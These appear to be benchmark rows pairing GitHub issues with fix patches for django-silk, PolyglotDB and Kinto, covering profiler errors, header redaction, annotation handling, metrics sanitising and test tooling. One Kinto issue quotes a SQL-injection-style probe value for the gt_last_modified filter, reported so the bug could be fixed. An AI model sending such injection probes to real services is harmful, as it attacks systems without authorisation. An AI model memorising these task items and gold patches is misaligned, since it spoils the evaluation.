data={"c": "227cd4d894c7deb", "ccuid": "a2696ad5-6610-4e1e-8e9f-c95174ea3c56", "rid": "8bf881e6-93da-48c2-9c04-fbc55210708e"})
```
Here are the query parameters:
```python
{
"c": "227cd4d894c7deb",
"ccuid": "a2696ad5-6610-4e1e-8e9f-c95174ea3c56",
"rid": "8bf881e6-93da-48c2-9c04-fbc55210708e"
}
```
| 2024-03-11T21:28:32 | 0.0 | [] | [] |
|||
jazzband/django-silk | jazzband__django-silk-692 | 23ff43b43fdc7abb78c2d738b0913bd3dfb3488d | diff --git a/silk/collector.py b/silk/collector.py
index 6c7f854b..912b9298 100644
--- a/silk/collector.py
+++ b/silk/collector.py
@@ -92,7 +92,13 @@ def configure(self, request=None, should_profile=True):
self._configure()
if should_profile:
self.local.pythonprofiler = cProfile.Profile()
- self.local.pythonprofiler.enable()
+ try:
+ self.local.pythonprofiler.enable()
+ except ValueError as e:
+ # Deal with cProfile not being allowed to run concurrently
+ # https://github.com/jazzband/django-silk/issues/682
+ Logger.error('Could not enable python profiler, %s' % str(e), exc_info=True)
+ self.local.pythonprofiler = None
def clear(self):
self.request = None
| [Python 3.12] ValueError: Another profiling tool is already active
In python 3.12 sometimes this exception raises, usually immediately after the server starts in the first request.
`SILKY_PYTHON_PROFILER = False` seems to fix it.
```
File "/backend/python/lib/python3.12/site-packages/django/core/handlers/exception.py", line 55, in inner
response = get_response(request)
File "/backend/python/lib/python3.12/site-packages/silk/middleware.py", line 70, in __call__
self.process_request(request)
File "/backend/python/lib/python3.12/site-packages/silk/middleware.py", line 121, in process_request
DataCollector().configure(request_model, should_profile=should_profile)
File "/backend/python/lib/python3.12/site-packages/silk/collector.py", line 95, in configure
self.local.pythonprofiler.enable()
ValueError: Another profiling tool is already active
```
https://github.com/python/cpython/issues/110770#issuecomment-1759986100
| 2023-12-30T22:30:22 | 0.0 | [] | [] |
|||
jazzband/django-silk | jazzband__django-silk-674 | 25b319197bda5f423cee2ecc9a01bd6f9624e36f | diff --git a/silk/model_factory.py b/silk/model_factory.py
index 59c57f51..a802beb4 100644
--- a/silk/model_factory.py
+++ b/silk/model_factory.py
@@ -66,19 +66,17 @@ def encoded_headers(self):
"""
From Django docs (https://docs.djangoproject.com/en/2.0/ref/request-response/#httprequest-objects):
"""
- headers = {}
- sensitive_headers = {'authorization'}
+ sensitive_headers = set(map(str.lower, SilkyConfig().SILKY_SENSITIVE_KEYS))
+ sensitive_headers.add('authorization')
+ if SilkyConfig().SILKY_HIDE_COOKIES:
+ sensitive_headers.add('cookie')
+ headers = {}
for k, v in self.request.headers.items():
+ k = k.lower()
if k in sensitive_headers:
v = RequestModelFactory.CLEANSED_SUBSTITUTE
-
headers[k] = v
- if SilkyConfig().SILKY_HIDE_COOKIES:
- try:
- del headers['COOKIE']
- except KeyError:
- pass
return json.dumps(headers, cls=DefaultEncoder, ensure_ascii=SilkyConfig().SILKY_JSON_ENSURE_ASCII)
| SILKY_HIDE_COOKIES does not hide cookie header in different case
The SILKY_HIDE_COOKIES setting does not hide the cookie header if it is written in a different case.
**Current behavior:**
When using the `SILKY_HIDE_COOKIES` setting, the cookie header is not hidden if it is written in a different case compared to the specified name in the code in upper case
**Expected behavior:**
The `SILKY_HIDE_COOKIES` setting should hide the cookie header, regardless of the case in which it is written. Currently, it only works if the case matches exactly.
**Steps to reproduce:**
1. Set the `SILKY_HIDE_COOKIES` setting to True.
2. Send a request with a 'cookie' header in lower case.
3. Inspect the request headers on the server side, and observe that the 'COOKIE' header is present.
**Refs**
- `COOKIE` in upper case is hardcoded [here](https://github.com/jazzband/django-silk/blob/master/silk/model_factory.py#L79)
| 2023-09-08T10:08:14 | 0.0 | [] | [] |
|||
MontrealCorpusTools/PolyglotDB | MontrealCorpusTools__PolyglotDB-148 | 36d97af291b7ddc60b5c8c8b974bc9a011ef96ad | diff --git a/polyglotdb/acoustics/io.py b/polyglotdb/acoustics/io.py
index 3f171a71..e329ad37 100755
--- a/polyglotdb/acoustics/io.py
+++ b/polyglotdb/acoustics/io.py
@@ -105,7 +105,7 @@ def point_measures_to_csv(corpus_context, data, header):
writer.writerow(row)
-def point_measures_from_csv(corpus_context, header_info):
+def point_measures_from_csv(corpus_context, header_info, annotation_type="phone"):
float_set_template = 'n.{name} = toFloat(csvLine.{name})'
int_set_template = 'n.{name} = toInt(csvLine.{name})'
bool_set_template = '''n.{name} = (CASE WHEN csvLine.{name} = 'False' THEN false ELSE true END)'''
@@ -134,18 +134,18 @@ def point_measures_from_csv(corpus_context, header_info):
import_statement = '''
USING PERIODIC COMMIT 2000
LOAD CSV WITH HEADERS FROM "{path}" AS csvLine
- MATCH (n:{phone_type}:{corpus_name}) where n.id = csvLine.id
+ MATCH (n:{annotation_type}:{corpus_name}) where n.id = csvLine.id
SET {new_properties}'''
statement = import_statement.format(path=import_path,
corpus_name=corpus_context.cypher_safe_name,
- phone_type=corpus_context.phone_name,
+ annotation_type=annotation_type,
new_properties=properties)
corpus_context.execute_cypher(statement)
for h in header_info.keys():
if h == 'id':
continue
- corpus_context.execute_cypher('CREATE INDEX ON :%s(%s)' % (corpus_context.phone_name, h))
- corpus_context.hierarchy.add_token_properties(corpus_context, corpus_context.phone_name,
+ corpus_context.execute_cypher('CREATE INDEX ON :%s(%s)' % (annotation_type, h))
+ corpus_context.hierarchy.add_token_properties(corpus_context, annotation_type,
[(h, t) for h, t in header_info.items() if h != 'id'])
corpus_context.encode_hierarchy()
diff --git a/polyglotdb/acoustics/other.py b/polyglotdb/acoustics/other.py
index c9fffed4..25f4da89 100644
--- a/polyglotdb/acoustics/other.py
+++ b/polyglotdb/acoustics/other.py
@@ -34,8 +34,10 @@ def generate_praat_script_function(praat_path, script_path, arguments=None):
def analyze_script(corpus_context,
- phone_class,
- script_path,
+ phone_class=None,
+ subset=None,
+ annotation_type=None,
+ script_path=None,
duration_threshold=0.01,
arguments=None,
call_back=None,
@@ -57,7 +59,11 @@ def analyze_script(corpus_context,
corpus_context : :class:`~polyglot.corpus.context.CorpusContext`
corpus context to use
phone_class : str
- the name of an already encoded phone class, on which the analysis will be run
+ DEPRECATED, the name of an already encoded subset of phones on which the analysis will be run
+ subset : str, optional
+ the name of an already encoded subset of an annotation type, on which the analysis will be run
+ annotation_type : str
+ the type of annotation that the analysis will go over
script_path : str
full path to the praat script
duration_threshold : float
@@ -75,10 +81,16 @@ def analyze_script(corpus_context,
"""
if file_type not in ['consonant', 'vowel', 'low_freq']:
raise ValueError('File type must be one of: consonant, vowel, or low_freq')
+
+ if phone_class is not None:
+ raise DeprecationWarning("The phone_class parameter has now been deprecated, please use annotation_type='phone' and subset='{}'".format(phone_class))
+ annotation_type = corpus_context.phone_name
+ subset = phone_class
+
if call_back is not None:
- call_back('Analyzing phones...')
+ call_back('Analyzing {}...'.format(annotation_type))
time_section = time.time()
- segment_mapping = generate_segments(corpus_context, corpus_context.phone_name, phone_class, file_type=file_type,
+ segment_mapping = generate_segments(corpus_context, annotation_type, subset, file_type=file_type,
padding=0, duration_threshold=duration_threshold)
if call_back is not None:
call_back("generate segments took: " + str(time.time() - time_section))
@@ -92,7 +104,7 @@ def analyze_script(corpus_context,
header = sorted(list(output.values())[0].keys())
header_info = {h: float for h in header}
point_measures_to_csv(corpus_context, output, header)
- point_measures_from_csv(corpus_context, header_info)
+ point_measures_from_csv(corpus_context, header_info, annotation_type=annotation_type)
return [x for x in header if x != 'id']
diff --git a/polyglotdb/corpus/audio.py b/polyglotdb/corpus/audio.py
index 9dd05cdd..516295b1 100755
--- a/polyglotdb/corpus/audio.py
+++ b/polyglotdb/corpus/audio.py
@@ -403,10 +403,10 @@ def analyze_intensity(self, source='praat', stop_check=None, call_back=None, mul
"""
analyze_intensity(self, source, stop_check, call_back, multiprocessing=multiprocessing)
- def analyze_script(self, phone_class, script_path, duration_threshold=0.01, arguments=None, stop_check=None,
+ def analyze_script(self, phone_class=None, subset=None, annotation_type=None, script_path=None, duration_threshold=0.01, arguments=None, stop_check=None,
call_back=None, multiprocessing=True, file_type='consonant'):
"""
- Use a Praat script to analyze phones in the corpus. The Praat script must return properties per phone (i.e.,
+ Use a Praat script to analyze annotation types in the corpus. The Praat script must return properties per phone (i.e.,
point measures, not a track), and these properties will be saved to the Neo4j database.
See :meth:`polyglotdb.acoustics.other..analyze_script` for more details.
@@ -414,7 +414,11 @@ def analyze_script(self, phone_class, script_path, duration_threshold=0.01, argu
Parameters
----------
phone_class : str
- Name of the phone subset to analyze
+ DEPRECATED, the name of an already encoded subset of phones on which the analysis will be run
+ subset : str, optional
+ the name of an already encoded subset of an annotation type, on which the analysis will be run
+ annotation_type : str
+ the type of annotation that the analysis will go over
script_path : str
Path to the Praat script
duration_threshold : float
@@ -435,7 +439,7 @@ def analyze_script(self, phone_class, script_path, duration_threshold=0.01, argu
list
List of the names of newly added properties to the Neo4j database
"""
- return analyze_script(self, phone_class, script_path, duration_threshold=duration_threshold,
+ return analyze_script(self, subset=subset, annotation_type=annotation_type, phone_class=phone_class, script_path=script_path, duration_threshold=duration_threshold,
arguments=arguments,
stop_check=stop_check, call_back=call_back, multiprocessing=multiprocessing)
diff --git a/polyglotdb/corpus/importable.py b/polyglotdb/corpus/importable.py
index 7abdb9f2..5e270c2e 100755
--- a/polyglotdb/corpus/importable.py
+++ b/polyglotdb/corpus/importable.py
@@ -165,6 +165,10 @@ def load_discourse(self, parser, path):
"""
data = parser.parse_discourse(path)
+
+ #If there is no data, e.g. empty TextGrid, return the empty list early.
+ if data is None:
+ return []
self.initialize_import(data.speakers, data.token_headers, data.hierarchy.subannotations)
self.add_types(*data.types(self.corpus_name))
self.add_discourse(data)
diff --git a/polyglotdb/io/enrichment/helper.py b/polyglotdb/io/enrichment/helper.py
index ca27edc3..fd5c1d8e 100755
--- a/polyglotdb/io/enrichment/helper.py
+++ b/polyglotdb/io/enrichment/helper.py
@@ -1,5 +1,6 @@
import csv
from collections import defaultdict
+from ...exceptions import ParseError
def sanitize_name(string):
@@ -16,6 +17,8 @@ def sanitize_name(string):
str
Sanitized string
"""
+ if "." in string:
+ raise ParseError("Column name, \"{}\" contains a period which is not permitted in CSVs used by PolyglotDB".format(string))
return string.strip().replace(' ', '_').lower()
diff --git a/polyglotdb/io/helper.py b/polyglotdb/io/helper.py
index 517a03a1..b884f396 100755
--- a/polyglotdb/io/helper.py
+++ b/polyglotdb/io/helper.py
@@ -308,16 +308,16 @@ def find_wav_path(path):
str or None
Full path of the wav file if it exists or None if it does not
"""
- wav_path = ""
name, ext = os.path.splitext(path)
+
wav_path = name + '.wav'
- if ".WAV" in ext:
- wav_path = name + '.WAV'
- elif ".wav" in ext:
- wav_path = name + '.wav'
- #print("path:",wav_path)
if os.path.exists(wav_path):
return wav_path
+
+ wav_path = name + '.WAV'
+ if os.path.exists(wav_path):
+ return wav_path
+
return None
diff --git a/polyglotdb/io/parsers/textgrid.py b/polyglotdb/io/parsers/textgrid.py
index 93276d9c..ce46dc39 100755
--- a/polyglotdb/io/parsers/textgrid.py
+++ b/polyglotdb/io/parsers/textgrid.py
@@ -4,6 +4,7 @@
from polyglotdb.exceptions import TextGridError
from polyglotdb.structure import Hierarchy
+from polyglotdb.io.types.parsing import Orthography, Transcription
from .base import BaseParser, DiscourseData
@@ -98,6 +99,22 @@ def parse_discourse(self, path, types_only=False):
self.annotation_tiers[i].add(((x.mark.strip(), x.minTime, x.maxTime) for x in ti))
else:
self.annotation_tiers[i].add(((x.mark.strip(), x.time) for x in ti))
+
+ is_empty_textgrid = True
+
+ for t in self.annotation_tiers:
+ for interval in t:
+ if isinstance(interval, Orthography):
+ if interval.label != "":
+ is_empty_textgrid = False
+ break
+ if isinstance(interval, Transcription):
+ if interval._list != []:
+ is_empty_textgrid = False
+ break
+ if is_empty_textgrid:
+ return None
+
pg_annotations = self._parse_annotations(types_only)
data = DiscourseData(name, pg_annotations, self.hierarchy)
| Allow for custom praat scripts to be run with non-phone annotation types
Currently praat scripts only work for phone intervals. Conceivably this can be generalized to all annotation types, i.e. for scripts that measure SNR for utterances.
Accept WAV files as well as wav
Right now files are not found if they end with `.WAV` instead of `.wav`. This is not ideal since a lot of older corpora use the former.
| 2019-06-27T15:22:11 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-3477 | 10cca5fa71dee834068f9405cf6f7df28c14f7d4 | diff --git a/kinto/core/resource/__init__.py b/kinto/core/resource/__init__.py
index f8aaa7b15..da447642e 100644
--- a/kinto/core/resource/__init__.py
+++ b/kinto/core/resource/__init__.py
@@ -665,7 +665,7 @@ def delete(self):
obj = self._get_object_or_404(self.object_id)
self._raise_412_if_modified(obj)
- # Retreive the last_modified information from a querystring if present.
+ # Retrieve the last_modified information from a querystring if present.
last_modified = self.request.validated["querystring"].get("last_modified")
# If less or equal than current object. Ignore it.
@@ -1060,7 +1060,8 @@ def _extract_filters(self):
"""Extracts filters from QueryString parameters."""
def is_valid_timestamp(value):
- return isinstance(value, int) or re.match(r'^"?\d+"?$', str(value))
+ # Is either integer, or integer as string, or integer between 2 quotes.
+ return isinstance(value, int) or re.match(r'^(\d+)$|^("\d+")$', str(value))
queryparams = self.request.validated["querystring"]
| Crash with `psycopg2.errors.InvalidTextRepresentation` (bigint) with last_modified = `1733242309482"`
```
(psycopg2.errors.InvalidTextRepresentation) invalid input syntax for type bigint: "1733242309482""
LINE 7: AND as_epoch(last_modified) > '1733242309482"'
^
[SQL:
SELECT id, as_epoch(last_modified) AS last_modified, data
FROM objects
WHERE parent_id = %(parent_id)s
AND resource_name = %(resource_name)s
AND as_epoch(last_modified) > %(filters_value_0)s
ORDER BY last_modified DESC
LIMIT %(pagination_limit)s;
]
[parameters: {'parent_id': '/buckets/main/collections/quicksuggest', 'resource_name': 'record', 'filters_value_0': '1733242309482"', 'pagination_limit': 10001}]
(Background on this error at: https://sqlalche.me/e/20/9h9h
)
```
| 2024-12-10T18:02:02 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-3476 | 10cca5fa71dee834068f9405cf6f7df28c14f7d4 | diff --git a/kinto/core/initialization.py b/kinto/core/initialization.py
index 397dc7ce9..0b8fa7adc 100644
--- a/kinto/core/initialization.py
+++ b/kinto/core/initialization.py
@@ -1,6 +1,7 @@
import logging
import random
import re
+import urllib.parse
import warnings
from datetime import datetime
from secrets import token_hex
@@ -474,6 +475,7 @@ def on_new_response(event):
try:
endpoint = utils.strip_uri_prefix(request.path)
+ endpoint = urllib.parse.quote_plus(endpoint, safe="/?&=-_")
except UnicodeDecodeError as e:
# This `on_new_response` callback is also called when a HTTP 400
# is returned because of an invalid UTF-8 path. We still want metrics.
@@ -507,7 +509,7 @@ def on_new_response(event):
unique=[
("method", request.method.lower()),
("endpoint", endpoint),
- ("status", str(request.response.status_code)),
+ ("status", str(event.response.status_code)),
]
+ metrics_matchdict_labels,
)
@@ -527,7 +529,7 @@ def on_new_response(event):
# Observe response size.
metrics_service.observe(
"request_size",
- len(request.response.body or b""),
+ len(event.response.body or b""),
labels=[("endpoint", endpoint)] + metrics_matchdict_labels,
)
diff --git a/kinto/plugins/statsd.py b/kinto/plugins/statsd.py
index b6a8830fb..5ae894011 100644
--- a/kinto/plugins/statsd.py
+++ b/kinto/plugins/statsd.py
@@ -13,6 +13,14 @@
statsd_module = None
+def sanitize(value):
+ """
+ Telegraf does not support ':' in values.
+ See https://github.com/influxdata/telegraf/issues/4495
+ """
+ return value.replace(":", "") if isinstance(value, str) else value
+
+
@implementer(metrics.IMetricsService)
class StatsDService:
def __init__(self, host, port, prefix):
@@ -22,7 +30,7 @@ def timer(self, key):
return self._client.timer(key)
def observe(self, key, value, labels=[]):
- return self._client.gauge(key, value)
+ return self._client.gauge(key, sanitize(value))
def count(self, key, count=1, unique=None):
if unique is None:
@@ -30,7 +38,7 @@ def count(self, key, count=1, unique=None):
if isinstance(unique, list):
# [("method", "get")] -> "method.get"
# [("endpoint", "/"), ("method", "get")] -> "endpoint./.method.get"
- unique = ".".join(f"{label[0]}.{label[1]}" for label in unique)
+ unique = ".".join(f"{label[0]}.{sanitize(label[1])}" for label in unique)
else:
warnings.warn(
"`unique` parameter should be of type ``list[tuple[str, str]]``",
| Sanitize endpoints strings before sending metrics to StatsD or Prometheus
https://github.com/Kinto/kinto/blob/10cca5fa71dee834068f9405cf6f7df28c14f7d4/kinto/plugins/statsd.py#L33
See https://github.com/mozilla/remote-settings/issues/722
| 2024-12-10T17:26:40 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-3425 | b68cae5a274595887be91e06317c01edb1c63835 | diff --git a/kinto/core/resource/__init__.py b/kinto/core/resource/__init__.py
index 994f43cf4..f8aaa7b15 100644
--- a/kinto/core/resource/__init__.py
+++ b/kinto/core/resource/__init__.py
@@ -1058,6 +1058,10 @@ def _extract_limit(self):
def _extract_filters(self):
"""Extracts filters from QueryString parameters."""
+
+ def is_valid_timestamp(value):
+ return isinstance(value, int) or re.match(r'^"?\d+"?$', str(value))
+
queryparams = self.request.validated["querystring"]
filters = []
@@ -1090,7 +1094,7 @@ def _extract_filters(self):
send_alert(self.request, message, url)
operator = COMPARISON.LT
- if value == "" or not isinstance(value, (int, str, type(None))):
+ if value is not None and not is_valid_timestamp(value):
raise_invalid(self.request, **error_details)
filters.append(Filter(self.model.modified_field, value, operator))
@@ -1127,7 +1131,7 @@ def _extract_filters(self):
error_details["description"] = "Invalid character 0x00"
raise_invalid(self.request, **error_details)
- if field == self.model.modified_field and value == "":
+ if field == self.model.modified_field and not is_valid_timestamp(value):
raise_invalid(self.request, **error_details)
filters.append(Filter(field, value, operator))
| Crash with invalid integer value for `gt_last_modified`
For example:
```
querystring = {
_sort: "last_modified",
gt_last_modified: "171103608603432920249' or '7127'='7127"
}
```
crashes with
```
DataError (psycopg2.errors.NumericValueOutOfRange) value "171103608603432920249' or '7127'='7127" is out of range for type bigint
LINE 7: AND as_epoch(last_modified) > '17110360860343292...
```
We should check here that integer is passed:
https://github.com/Kinto/kinto/blob/cb9cbf76beee92f7d09a3c498ebaa70ed195f256/kinto/core/resource/__init__.py#L1130-L1131
| 2024-06-19T16:37:09 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-3382 | 039d3e30008dfe9afb0ef55429aee7e7921f6c96 | diff --git a/Makefile b/Makefile
index c57ebbdbc..5726bf295 100644
--- a/Makefile
+++ b/Makefile
@@ -116,6 +116,7 @@ functional: install-dev need-kinto-running
$(VENV)/bin/py.test tests/functional.py
browser-test: need-kinto-running
+ $(VENV)/bin/playwright install firefox
$(VENV)/bin/py.test tests/browser.py
clean:
diff --git a/constraints.in b/constraints.in
index b706aa9ec..1a2c98377 100644
--- a/constraints.in
+++ b/constraints.in
@@ -33,7 +33,7 @@ bravado_core
pytest
pytest-cache
pytest-cov
-selenium
+playwright
webtest
# dev
build
diff --git a/constraints.txt b/constraints.txt
index 0ad1011a8..f24719053 100644
--- a/constraints.txt
+++ b/constraints.txt
@@ -1,17 +1,15 @@
#
-# This file is autogenerated by pip-compile with Python 3.9
+# This file is autogenerated by pip-compile with Python 3.10
# by the following command:
#
-# pip-compile --strip-extras
+# pip-compile --output-file=constraints.txt --strip-extras constraints.in
#
arrow==1.3.0
# via isoduration
attrs==23.2.0
# via
# jsonschema
- # outcome
# referencing
- # trio
bcrypt==4.1.2
# via -r constraints.in
beautifulsoup4==4.12.3
@@ -23,7 +21,6 @@ build==1.0.3
certifi==2023.11.17
# via
# requests
- # selenium
# sentry-sdk
charset-normalizer==3.3.2
# via requests
@@ -46,27 +43,21 @@ coverage==7.4.0
dockerflow==2024.1.0
# via -r constraints.in
exceptiongroup==1.2.0
- # via
- # pytest
- # trio
- # trio-websocket
+ # via pytest
execnet==2.0.2
# via pytest-cache
fqdn==1.5.1
# via jsonschema
greenlet==3.0.3
- # via sqlalchemy
-h11==0.14.0
- # via wsproto
+ # via
+ # playwright
+ # sqlalchemy
hupper==1.12
# via pyramid
idna==3.6
# via
# jsonschema
# requests
- # trio
-importlib-metadata==7.0.1
- # via build
iniconfig==2.0.0
# via pytest
iso8601==2.1.0
@@ -96,8 +87,6 @@ msgpack==1.0.7
# via bravado-core
newrelic==9.6.0
# via -r constraints.in
-outcome==1.3.0.post0
- # via trio
packaging==23.2
# via
# build
@@ -111,10 +100,14 @@ plaster==1.1.2
# pyramid
plaster-pastedeploy==1.0.1
# via pyramid
+playwright==1.41.1
+ # via -r constraints.in
pluggy==1.3.0
# via pytest
psycopg2==2.9.9
# via -r constraints.in
+pyee==11.0.1
+ # via playwright
pyproject-hooks==1.0.0
# via build
pyramid==2.0.2
@@ -130,8 +123,6 @@ pyramid-multiauth==1.0.1
# via -r constraints.in
pyramid-tm==2.5
# via -r constraints.in
-pysocks==1.7.1
- # via urllib3
pytest==7.4.4
# via
# -r constraints.in
@@ -176,8 +167,6 @@ rpds-py==0.17.1
# referencing
ruff==0.1.15
# via -r constraints.in
-selenium==4.12.0
- # via -r constraints.in
sentry-sdk==1.39.2
# via -r constraints.in
simplejson==3.19.2
@@ -188,10 +177,6 @@ six==1.16.0
# cornice-swagger
# python-dateutil
# rfc3339-validator
-sniffio==1.3.0
- # via trio
-sortedcontainers==2.4.0
- # via trio
soupsieve==2.5
# via beautifulsoup4
sqlalchemy==2.0.25
@@ -220,16 +205,11 @@ translationstring==1.4
# via
# colander
# pyramid
-trio==0.24.0
- # via
- # selenium
- # trio-websocket
-trio-websocket==0.11.1
- # via selenium
types-python-dateutil==2.8.19.20240106
# via arrow
typing-extensions==4.9.0
# via
+ # pyee
# sqlalchemy
# swagger-spec-validator
uri-template==1.3.0
@@ -237,7 +217,6 @@ uri-template==1.3.0
urllib3==2.1.0
# via
# requests
- # selenium
# sentry-sdk
venusian==3.1.0
# via
@@ -257,10 +236,6 @@ webtest==3.0.0
# via -r constraints.in
werkzeug==3.0.1
# via -r constraints.in
-wsproto==1.2.0
- # via trio-websocket
-zipp==3.17.0
- # via importlib-metadata
zope-deprecation==5.0
# via pyramid
zope-interface==6.1
diff --git a/docs/community.rst b/docs/community.rst
index 1abc7afc3..3751913c3 100644
--- a/docs/community.rst
+++ b/docs/community.rst
@@ -235,16 +235,7 @@ In another terminal, run the end-to-end tests with:
Browser Tests
-------------
-
-Make sure the `geckodriver <https://github.com/mozilla/geckodriver/releases>`_ binary is available in your path.
-
-.. note::
-
- If your installation of *Firefox* is custom, specify the path of its binary using an alias:
-
- ::
-
- alias geckodriver="geckodriver --binary /path/to/firefox"
+We use `playwright <https://playwright.dev/>`_ for browser testing. The tests included in this repo are very simple and verify the admin UI can at least authenticate with the current kinto back-end. Comprehensive unit tests are maintained in the kinto-admin repo.
In a terminal, run an instance with the provided ``browser.ini`` configuration:
diff --git a/pyproject.toml b/pyproject.toml
index b21d218c3..3385307c1 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -87,7 +87,7 @@ test = [
"pytest",
"pytest-cache",
"pytest-cov",
- "selenium",
+ "playwright",
"webtest",
]
dev = [
| Investigate selenium test errors
We've had some recent inconsistent test runs with browser-tests where selenium will fail due to stale DOM elements. Initial investigations couldn't find a good solution so we have a time.sleep(1) line in the browser tests now. Locate and fix this the root cause.
| We also now have errors on Selenium > 4.12 | 2024-02-02T16:07:35 | 0.0 | [] | [] |
||
Kinto/kinto | Kinto__kinto-3359 | 3bea2d67dda5f820c6a5857dac192590032624d0 | diff --git a/Dockerfile b/Dockerfile
index 418f08f63..6c69d5dd8 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -25,7 +25,9 @@ COPY --from=python-builder /opt/venv /opt/venv
COPY . /app
COPY --from=node-builder /kinto/plugins/admin/build ./kinto/plugins/admin/build
-ENV KINTO_INI=/etc/kinto/kinto.ini \
+ARG KINTO_VERSION=1
+ENV SETUPTOOLS_SCM_PRETEND_VERSION_FOR_KINTO=${KINTO_VERSION} \
+ KINTO_INI=/etc/kinto/kinto.ini \
PORT=8888 \
PATH="/opt/venv/bin:$PATH"
diff --git a/MANIFEST.in b/MANIFEST.in
deleted file mode 100644
index 8aa0b5b0f..000000000
--- a/MANIFEST.in
+++ /dev/null
@@ -1,6 +0,0 @@
-include *.rst LICENSE Makefile app.wsgi requirements.txt dev-requirements.txt
-include kinto/config/kinto.tpl
-recursive-include kinto *.sql *.html
-recursive-include docs *.rst *.png *.svg *.css *.html conf.py piwik.js
-include kinto/plugins/admin/VERSION
-recursive-include kinto/plugins/admin/build *
diff --git a/Makefile b/Makefile
index 66fca0c21..e94b5c7e1 100644
--- a/Makefile
+++ b/Makefile
@@ -37,7 +37,7 @@ help:
all: install
install: $(INSTALL_STAMP)
-$(INSTALL_STAMP): $(PYTHON) setup.py requirements.txt setup.cfg
+$(INSTALL_STAMP): $(PYTHON) requirements.txt pyproject.toml
$(VENV)/bin/pip install -U pip
$(VENV)/bin/pip install -Ue . -c requirements.txt
touch $(INSTALL_STAMP)
@@ -55,8 +55,8 @@ install-memcached: $(INSTALL_STAMP) $(DEV_STAMP)
$(VENV)/bin/pip install -Ue ".[memcached]" -c requirements.txt
install-dev: $(INSTALL_STAMP) $(DEV_STAMP)
-$(DEV_STAMP): $(PYTHON) dev-requirements.txt
- $(VENV)/bin/pip install -Ur dev-requirements.txt
+$(DEV_STAMP): $(PYTHON) requirements.txt
+ $(VENV)/bin/pip install -Ue ".[dev,test]" -c requirements.txt
touch $(DEV_STAMP)
install-docs: $(DOC_STAMP)
@@ -64,6 +64,9 @@ $(DOC_STAMP): $(PYTHON) docs/requirements.txt
$(VENV)/bin/pip install -Ur docs/requirements.txt
touch $(DOC_STAMP)
+requirements.txt: requirements.in
+ pip-compile
+
build-kinto-admin: need-npm
scripts/build-kinto-admin.sh
@@ -86,7 +89,7 @@ migrate: install $(SERVER_CONFIG)
test: tests
tests-once: tests
tests: install-postgres install-monitoring install-memcached version-file install-dev
- $(VENV)/bin/py.test --cov-config setup.cfg --cov-report term-missing --cov-fail-under 100 --cov kinto
+ $(VENV)/bin/py.test --cov-config pyproject.toml --cov-report term-missing --cov-fail-under 100 --cov kinto
tests-raw: version-file install-dev
$(VENV)/bin/py.test
@@ -134,9 +137,10 @@ docs: install-docs
@echo
@echo "Build finished. The HTML pages are in $(SPHINX_BUILDDIR)/html/index.html"
+.PHONY: build
build:
- docker build --pull -t kinto/kinto-server:latest .
+ docker build --build-arg="KINTO_VERSION=$(shell git describe --abbrev=0)" --pull -t kinto/kinto-server:latest .
test-description: install-dev
- $(VENV)/bin/python setup.py bdist_wheel
+ $(VENV)/bin/python -m build
$(VENV)/bin/twine check dist/*.whl
diff --git a/dev-requirements.txt b/dev-requirements.txt
deleted file mode 100644
index cb8b3a6c0..000000000
--- a/dev-requirements.txt
+++ /dev/null
@@ -1,13 +0,0 @@
-bravado==11.0.3
-bravado_core==6.1.1
-pytest==7.4.4
-pytest-cache==1.0
-pytest-cov==4.1.0
-pytest-watch==4.2.0
-python-memcached==1.62
-ruff==0.1.14
-selenium==4.12.0
-swagger-spec-validator==3.0.3
-WebTest==3.0.0
-wheel==0.42.0
-zest.releaser==9.1.1
diff --git a/docs/community.rst b/docs/community.rst
index 103f65c2d..1abc7afc3 100644
--- a/docs/community.rst
+++ b/docs/community.rst
@@ -274,72 +274,32 @@ There are three levels of cleaning your environment:
How to release
==============
-In order to prepare a new release, we are following the following steps.
-
-The ``prerelease`` and ``postrelease`` commands are coming from `zest.releaser
-<https://pypi.python.org/pypi/zest.releaser>`_, which should already be
-installed along with other development requirements.
+In order to prepare a new release, follow these steps:
Step 1
------
- Merge remaining pull requests
-- Update ``CHANGELOG.rst``
-- Update supported version in ``SECURITY.md``
+- Make sure supported version is up-to-date in :file:`SECURITY.md`
- If API was updated, update API changelog in :file:`docs/api/index.rst`
- Make sure ``HTTP_API_VERSION`` is up-to-date in :file:`kinto/__init__.py`
-- Update the link in :file:`docs/configuration/production.rst`
-- Update the **kinto-admin** version in :file:`kinto/plugins/admin/VERSION` if needed
- (`available releases <https://github.com/Kinto/kinto-admin/releases>`_)
-
-- Update :file:`CONTRIBUTORS.rst`. The following hairy command will output the full list:
+- Make sure the list of contributors is up-to-date in :file:`CONTRIBUTORS.rst`. The following hairy command will output the full list:
.. code-block:: bash
$ git shortlog -sne | awk '{$1=""; sub(" ", ""); print}' | awk -F'<' '!x[$1]++' | awk -F'<' '!x[$2]++' | sort
-- Leverage zest.releaser to update setup file and changelog:
-
-.. code-block:: bash
-
- $ git checkout -b prepare-X.Y.Z
- $ make test-description
- $ prerelease
-
-- Open a pull-request to release the new version.
-
-.. code-block:: bash
-
- $ git commit -a --amend
- $ git push origin prepare-X.Y.Z
-
-
Step 2
------
-Once the pull-request is approved, merge it and initiate a release.
-
-.. code-block:: bash
-
- $ git checkout main
- $ git tag -a X.Y.Z -m "X.Y.Z"
- $ git push origin X.Y.Z
-
-With this tag push, a Github Action will take care of publishing the package on Pypi.
+1. Create a release on Github on https://github.com/Kinto/kinto-attachment/releases/new
+2. Create a new tag `X.Y.Z` (*This tag will be created from the target when you publish this release.*)
+3. Generate release notes
+4. Publish release
Step 3
------
-As a final step:
-
-- Add entry in GitHub releases page
-- Check that the version in ReadTheDocs is up-to-date
-- Check that a Pypi package was built
+- Check that the version in ReadTheDocs was published
+- Check that a Pypi package was published
- Tweet about it!
-
-You can now use the ``postrelease`` command to add a new empty section in the changelog and bump the next version with a ``.dev0`` suffix.
-
-
-.. note::
-
- Dependabot will take care of upgrading the ``kinto`` package via pull-requests on the various repositories of the Kinto ecosystem.
diff --git a/docs/configuration/production.rst b/docs/configuration/production.rst
index 80e90b820..e26ab4c67 100644
--- a/docs/configuration/production.rst
+++ b/docs/configuration/production.rst
@@ -181,7 +181,7 @@ adjustments:
.. note::
For an exhaustive list of available settings and their default values,
